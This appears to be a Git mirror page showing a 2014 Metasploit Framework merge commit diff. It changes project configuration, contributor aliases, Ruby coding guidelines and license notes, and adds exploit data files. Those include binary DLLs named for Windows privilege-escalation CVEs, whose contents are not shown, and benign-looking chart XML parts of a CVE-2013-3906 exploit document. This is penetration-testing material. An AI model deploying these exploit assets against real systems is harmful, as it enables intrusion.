infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #2880, update unstable to master

unstable
William Vu 2014-01-14 11:43:47 -06:00
parent 927e35b4fc 95e0c136b8
commit 00527019b2
No known key found for this signature in database
GPG Key ID: E761DCB4C1629024
734 changed files with 34829 additions and 9145 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
.gitignore vendored
View File

@ -41,3 +41,13 @@ tags
*~
# Ignore backups of retabbed files
*.notab
# ignore Visual Studio external source garbage
*.suo
*.sdf
*.opensdf
*.user
# ignore release/debug folders for exploits
external/source/exploits/**/Debug
external/source/exploits/**/Release

3
.gitmodules vendored Normal file
View File

@ -0,0 +1,3 @@
[submodule "external/source/ReflectiveDLLInjection"]
path = external/source/ReflectiveDLLInjection
url = https://github.com/rapid7/ReflectiveDLLInjection.git

21
.mailmap
View File

@ -2,6 +2,7 @@ bturner-r7 <bturner-r7@github> Brandon Turner <brandon_turner@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <David_Maloney@rapid7.com>
dmaloney-r7 <dmaloney-r7@github> David Maloney <DMaloney@rapid7.com> # aka TheLightCosine
ecarey-r7 <ecarey-r7@github> Erran Carey <e@ipwnstuff.com>
farias-r7 <farias-r7@github> Fernando Arias <fernando_arias@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hd_moore@rapid7.com>
hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
@ -10,15 +11,18 @@ jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
joev-r7 <joev-r7@github> joev <joev@metasploit.com>
joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan_vazquez@rapid7.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>
shuckins-r7 <shuckins-r7@github> Samuel Huckins <samuel_huckins@rapid7.com>
tasos-r7 <tasos-r7@github> Tasos Laskos <Tasos_Laskos@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com>
trosen-r7 <trosen-r7@github> Trevor Rosen <Trevor_Rosen@rapid7.com>
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <William_Vu@rapid7.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@metasploit.com>
wvu-r7 <wvu-r7@github> William Vu <wvu@nmt.edu>
# Above this line are current Rapid7 employees. Below this paragraph are
@ -39,8 +43,8 @@ Chao-mu <Chao-Mu@github> chao-mu <chao.mu@minorcrash.com>
Chao-mu <Chao-Mu@github> chao-mu <chao@confusion.(none)>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
corelanc0d3er <corelanc0d3er@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3er <corelanc0d3er@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
corelanc0d3r <corelanc0d3r@github> corelanc0d3r <peter.ve@corelan.be>
corelanc0d3r <corelanc0d3r@github> Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
darkoperator <darkoperator@github> Carlos Perez <carlos_perez@darkoperator.com>
efraintorres <efraintorres@github> efraintorres <etlownoise@gmail.com>
efraintorres <efraintorres@github> et <>
@ -67,11 +71,22 @@ nevdull77 <nevdull77@github> Patrik Karlsson <patrik@cqure.net>
nmonkee <nmonkee@github> nmonkee <dave@northern-monkee.co.uk>
nullbind <nullbind@github> nullbind <scott.sutherland@nullbind.com>
ohdae <ohdae@github> ohdae <bindshell@live.com>
OJ <oj@github> OJ Reeves <oj@buffered.io>
OJ <oj@github> OJ <oj@buffered.io>
r3dy <r3dy@github> Royce Davis <r3dy@Royces-MacBook-Pro.local>
r3dy <r3dy@github> Royce Davis <royce.e.davis@gmail.com>
Rick Flores <0xnanoquetz9l@gmail.com> Rick Flores (nanotechz9l) <0xnanoquetz9l@gmail.com>
rsmudge <rsmudge@github> Raphael Mudge <rsmudge@gmail.com> # Aka `butane
schierlm <schierlm@github> Michael Schierl <schierlm@gmx.de> # Aka mihi
scriptjunkie <scriptjunkie@github> Matt Weeks <scriptjunkie@scriptjunkie.us>
skape <skape@???> Matt Miller <mmiller@hick.org>
spoonm <spoonm@github> Spoon M <spoonm@gmail.com>
swtornio <swtornio@github> Steve Tornio <swtornio@gmail.com>
Tasos Laskos <Tasos_Laskos@rapid7.com> Tasos Laskos <Tasos_Laskos@rapid7.com>
TrustedSec <davek@trustedsec.com> trustedsec <davek@trustedsec.com>
# Aliases for utility author names. Since they're fake, typos abound
Tab Assassin <tabassassin@metasploit.com> Tabasssassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> Tabassassin <tabassassin@metasploit.com>
Tab Assassin <tabassassin@metasploit.com> TabAssassin <tabasssassin@metasploit.com>

2
.ruby-version
View File

@ -1 +1 @@
1.9.3-p448
1.9.3-p484

6
.travis.yml
View File

@ -1,11 +1,13 @@
language: ruby
before_install:
- rake --version
- sudo apt-get update -qq
- sudo apt-get install -qq libpcap-dev
before_script:
- cp config/database.yml.travis config/database.yml
- rake db:create
- rake db:migrate
- bundle exec rake --version
- bundle exec rake db:create
- bundle exec rake db:migrate
rvm:
#- '1.8.7'

68
Gemfile
View File

@ -2,6 +2,8 @@ source 'https://rubygems.org'
# Need 3+ for ActiveSupport::Concern
gem 'activesupport', '>= 3.0.0'
# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
gem 'bcrypt-ruby'
# Needed for some admin modules (scrutinizer_add_user.rb)
gem 'json'
# Needed by msfgui and other rpc components
@ -14,50 +16,50 @@ gem 'robots'
gem 'packetfu', '1.1.9'
group :db do
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.16.6'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.16.9'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
end
group :pcap do
gem 'network_interface', '~> 0.0.1'
# For sniffer and raw socket modules
gem 'pcaprub'
# For sniffer and raw socket modules
gem 'pcaprub'
end
group :development do
# Markdown formatting for yard
gem 'redcarpet'
# generating documentation
gem 'yard'
# Markdown formatting for yard
gem 'redcarpet'
# generating documentation
gem 'yard'
end
group :development, :test do
# supplies factories for producing model instance for specs
# Version 4.1.0 or newer is needed to support generate calls without the
# 'FactoryGirl.' in factory definitions syntax.
gem 'factory_girl', '>= 4.1.0'
# Make rspec output shorter and more useful
gem 'fivemat', '1.2.1'
# running documentation generation tasks and rspec tasks
gem 'rake', '>= 10.0.0'
# supplies factories for producing model instance for specs
# Version 4.1.0 or newer is needed to support generate calls without the
# 'FactoryGirl.' in factory definitions syntax.
gem 'factory_girl', '>= 4.1.0'
# Make rspec output shorter and more useful
gem 'fivemat', '1.2.1'
# running documentation generation tasks and rspec tasks
gem 'rake', '>= 10.0.0'
end
group :test do
# Removes records from database created during tests. Can't use rspec-rails'
# transactional fixtures because multiple connections are in use so
# transactions won't work.
gem 'database_cleaner'
# testing framework
gem 'rspec', '>= 2.12'
gem 'shoulda-matchers'
# code coverage for tests
# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
gem 'simplecov', '0.5.4', :require => false
# Manipulate Time.now in specs
gem 'timecop'
# Removes records from database created during tests. Can't use rspec-rails'
# transactional fixtures because multiple connections are in use so
# transactions won't work.
gem 'database_cleaner'
# testing framework
gem 'rspec', '>= 2.12'
gem 'shoulda-matchers'
# code coverage for tests
# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
# see: https://github.com/colszowka/simplecov/issues/127 (hopefully fixed in 0.8.0)
gem 'simplecov', '0.5.4', :require => false
# Manipulate Time.now in specs
gem 'timecop'
end

6
Gemfile.lock
View File

@ -13,6 +13,7 @@ GEM
i18n (~> 0.6, >= 0.6.4)
multi_json (~> 1.0)
arel (3.0.2)
bcrypt-ruby (3.1.2)
builder (3.0.4)
database_cleaner (1.1.1)
diff-lcs (1.2.4)
@ -21,7 +22,7 @@ GEM
fivemat (1.2.1)
i18n (0.6.5)
json (1.8.0)
metasploit_data_models (0.16.6)
metasploit_data_models (0.16.9)
activerecord (>= 3.2.13)
activesupport
pg
@ -61,11 +62,12 @@ PLATFORMS
DEPENDENCIES
activerecord
activesupport (>= 3.0.0)
bcrypt-ruby
database_cleaner
factory_girl (>= 4.1.0)
fivemat (= 1.2.1)
json
metasploit_data_models (~> 0.16.6)
metasploit_data_models (~> 0.16.9)
msgpack
network_interface (~> 0.0.1)
nokogiri

54
HACKING
View File

@ -36,13 +36,7 @@ lock up the entire module when called from other interfaces. If you
need user input, you can either register an option or expose an
interactive session type specific for the type of exploit.
3. Don't use "sleep". It has been known to cause issues with
multi-threaded programs on various platforms running an older version of
Ruby such as 1.8. Instead, we use "select(nil, nil, nil, <time>)" or
Rex.sleep() throughout the framework. We have found this works around
the underlying issue.
4. Always use Rex sockets, not ruby sockets. This includes
3. Always use Rex sockets, not ruby sockets. This includes
third-party libraries such as Net::Http. There are several very good
reasons for this rule. First, the framework doesn't get notified on
the creation of ruby sockets and won't know how to clean them up in
@ -54,48 +48,48 @@ already implemented with Rex and if the protocol you need is missing,
porting another library to use them is straight-forward. See our
Net::SSH modifications in lib/net/ssh/ for an example.
5. When opening an IO stream, always force binary with "b" mode (or
4. When opening an IO stream, always force binary with "b" mode (or
using IO#binmode). This not only helps keep Windows and non-Windows
runtime environments consistent with each other, but also guarantees
that files will be treated as ASCII-8BIT instead of UTF-8.
6. Don't use String#[] for a single character. This returns a Fixnum in
5. Don't use String#[] for a single character. This returns a Fixnum in
ruby 1.8 and a String in 1.9, so it's safer to use the following idiom:
str[idx,1]
str[idx,1]
which always returns a String. If you need the ASCII byte, unpack it like
so:
str[idx,1].unpack("C")[0]
so:
tr[idx,1].unpack("C")[0]
7. Whenever possible, avoid using '+' or '+=' to concatenate strings.
6. Whenever possible, avoid using '+' or '+=' to concatenate strings.
The '<<' operator is significantly faster. The difference will become
even more apparent when doing string manipulation in a loop. The
following table approximates the underlying implementation:
Ruby Pseudo-C
----------- ----------------
a = b + c a = malloc(b.len+c.len+1);
strcpy(a, b);
memcpy(a+b.len, c, c.len);
a[b.len + c.len] = '\0';
a = b a = b;
a << c a = realloc(a, a.len+c.len+1);
memcpy(a+a.len, c, c.len);
a[a.len + c.len] = '\0';
Ruby Pseudo-C
----------- ----------------
a = b + c a = malloc(b.len+c.len+1);
strcpy(a, b);
memcpy(a+b.len, c, c.len);
a[b.len + c.len] = '\0';
a = b a = b;
a << c a = realloc(a, a.len+c.len+1);
memcpy(a+a.len, c, c.len);
a[a.len + c.len] = '\0';
Note that the original value of 'b' is lost in the second case. Care
must be taken to duplicate strings that you do not want to modify.
8. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
7. For other Ruby 1.8.x/1.9.x compat issues, please see Sam Ruby's
excellent slide show at <http://slideshow.rubyforge.org/ruby19.html>
for an overview of common and not-so-common Ruby version related gotchas.
9. Never, ever use $global variables. This applies to modules, mixins,
8. Never, ever use $global variables. This applies to modules, mixins,
and libraries. If you need a "global" within a specific class, you can
use @@class_variables, but most modules should use @instance variables
to store information between methods.
10. Do not define CONSTANTS within individual modules. This can lead to
warning messages when the module is reloaded. Try to keep constants
inside libraries and mixins instead.
to store information between methods.
9. Don't craft your XML document raw or by using Nokogiri, the current
preferred way is REXML.
Creating New Modules
====================

87
LICENSE
View File

@ -41,93 +41,10 @@ Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
2007 H D Moore <hdm [at] metasploit.com>
License: GPL-2 and Artistic
Files: external/source/meterpreter/ReflectiveDLLInjection/*
Copyright: 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
Files: external/source/ReflectiveDLLInjection/*
Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
License: BSD-3-clause
Files: external/source/meterpreter/source/common/queue.h
Copyright: 1991, 1993 The Regents of the University of California
License: BSD-3-clause
Files: external/source/meterpreter/source/common/zlib/* external/source/meterpreter/source/server/zlib/*
Copyright: 1995-1996 Jean-loup Gailly and Mark Adler
License: Zlib
Files: external/source/meterpreter/source/bionic/libc/*
Copyright: 2005-2008, The Android Open Source Project
2004 by Internet Systems Consortium, Inc. ("ISC")
1995,1996,1999 by Internet Software Consortium
1995 by International Business Machines, Inc.
1997,1998,1999,2004 The NetBSD Foundation, Inc.
1993 Christopher G. Demetriou
1983,1985,1989,1993 The Regents of the University of California
2000 Ben Harris
1995,1996,1997,1998 WIDE Project
2003 Networks Associates Technology, Inc.
1993 by Digital Equipment Corporation
1997 Mark Brinicombe
1993 Martin Birgmeier
1993 by Sun Microsystems, Inc.
1997, 2005 Todd C. Miller <Todd.Miller@courtesan.com>
1995, 1996 Carnegie-Mellon University
2003 Networks Associates Technology, Inc.
License: BSD-3-clause and BSD-4-clause
Files: external/source/meterpreter/source/bionic/libdl/*
Copyright: 2007 The Android Open Source Project
License: BSD-3-clause
Files: external/source/meterpreter/source/bionic/libm/*
Copyright: 2003, Steven G. Kargl
2003 Mike Barcroft <mike@FreeBSD.org>
2002-2005 David Schultz <das@FreeBSD.ORG>
2004 Stefan Farfeleder
2003 Dag-Erling Coïdan Smørgrav
1996 The NetBSD Foundation, Inc.
1985,1988,1991,1992,1993 The Regents of the University of California
1993,94 Winning Strategies, Inc.
1993, 2004 by Sun Microsystems, Inc.
License: BSD-2-clause and BSD-3-clause and BSD-4-clause
Files: external/source/meterpreter/source/extensions/espia/screen.c
Copyright: 1994-2008, Mark Hammond
License: BSD-2-clause
Files: external/source/meterpreter/source/extensions/priv/server/timestomp.c
Copyright: 2005 Vincent Liu
License: GPL-2
Files: external/source/meterpreter/source/extensions/stdapi/server/webcam/bmp2jpeg.c external/source/meterpreter/source/screenshot/bmp2jpeg.c
Copyright: 1994-2008, Mark Hammond
License: BSD-2-clause
Files: external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun.c
Copyright: 2010, patrickHVE@googlemail.com
License: BSD-2-clause
Files: external/source/meterpreter/source/pssdk/*
Copyright: microOLAP
License: N/A
Comment: HD Moore holds a single-seat developer license for the Packet Sniffer
SDK library embedded into the Meterpreter Sniffer extension. This
source code is not distributed with Metasploit Framework.
Files: external/source/meterpreter/source/openssl/*
Copyright: 1998-2002 The OpenSSL Project
License: OpenSSL and SSLeay
Files: external/source/meterpreter/source/server/posix/sfsyscall.h
Copyright: 2003 Philippe Biondi <biondi@cartel-securite.fr>
License: LGPL
Files: external/source/meterpreter/source/jpeg-8/*
Copyright: 1991-2010, Thomas G. Lane, Guido Vollbeding
License: BSD-3-clause
Files: external/source/meterpreter/source/libpcap/*
Copyright: 1990, 1991, 1992, 1993, 1994, 1995, 1996, 1997 The Regents of the University of California.
License: BSD-4-clause
Files: external/source/metsvc/*
Copyright: 2007, Determina Inc.
License: BSD-3-clause

BIN
data/exploits/CVE-2010-0232/kitrap0d.x86.dll Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2013-0109/nvidia_nvsvc.x86.dll Executable file
View File

Binary file not shown.

6
data/exploits/CVE-2013-3906/_rels/.rels Executable file
View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/>
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/>
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>

19
data/exploits/CVE-2013-3906/docProps/app.xml Executable file
View File

@ -0,0 +1,19 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
<Template>Normal.dotm</Template>
<TotalTime>4</TotalTime>
<Pages>1</Pages>
<Words>217</Words>
<Characters>1238</Characters>
<Application>Microsoft Office Word</Application>
<DocSecurity>0</DocSecurity>
<Lines>10</Lines>
<Paragraphs>2</Paragraphs>
<ScaleCrop>false</ScaleCrop>
<Company>home</Company>
<LinksUpToDate>false</LinksUpToDate>
<CharactersWithSpaces>1453</CharactersWithSpaces>
<SharedDoc>false</SharedDoc>
<HyperlinksChanged>false</HyperlinksChanged>
<AppVersion>12.0000</AppVersion>
</Properties>

8
data/exploits/CVE-2013-3906/docProps/core.xml Executable file
View File

@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:creator>Win7</dc:creator>
<cp:lastModifiedBy>Win7</cp:lastModifiedBy>
<cp:revision>1</cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2013-10-03T22:46:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2013-10-03T23:17:00Z</dcterms:modified>
</cp:coreProperties>

4
data/exploits/CVE-2013-3906/word/charts/_rels/chart1.xml.rels Executable file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet1.xlsx"/>
</Relationships>

4
data/exploits/CVE-2013-3906/word/charts/_rels/chart2.xml.rels Executable file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet2.xlsx"/>
</Relationships>

4
data/exploits/CVE-2013-3906/word/charts/_rels/chart3.xml.rels Executable file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet3.xlsx"/>
</Relationships>

4
data/exploits/CVE-2013-3906/word/charts/_rels/chart4.xml.rels Executable file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet4.xlsx"/>
</Relationships>

4
data/exploits/CVE-2013-3906/word/charts/_rels/chart5.xml.rels Executable file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet5.xlsx"/>
</Relationships>

4
data/exploits/CVE-2013-3906/word/charts/_rels/chart6.xml.rels Executable file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet6.xlsx"/>
</Relationships>

230
data/exploits/CVE-2013-3906/word/charts/chart1.xml Executable file
View File

@ -0,0 +1,230 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="col"/>
<c:grouping val="standard"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="cylinder"/>
<c:axId val="51657728"/>
<c:axId val="69190400"/>
<c:axId val="25292288"/>
</c:bar3DChart>
<c:catAx>
<c:axId val="51657728"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="69190400"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="69190400"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="51657728"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:serAx>
<c:axId val="25292288"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="69190400"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

220
data/exploits/CVE-2013-3906/word/charts/chart2.xml Executable file
View File

@ -0,0 +1,220 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:rAngAx val="1"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="col"/>
<c:grouping val="clustered"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
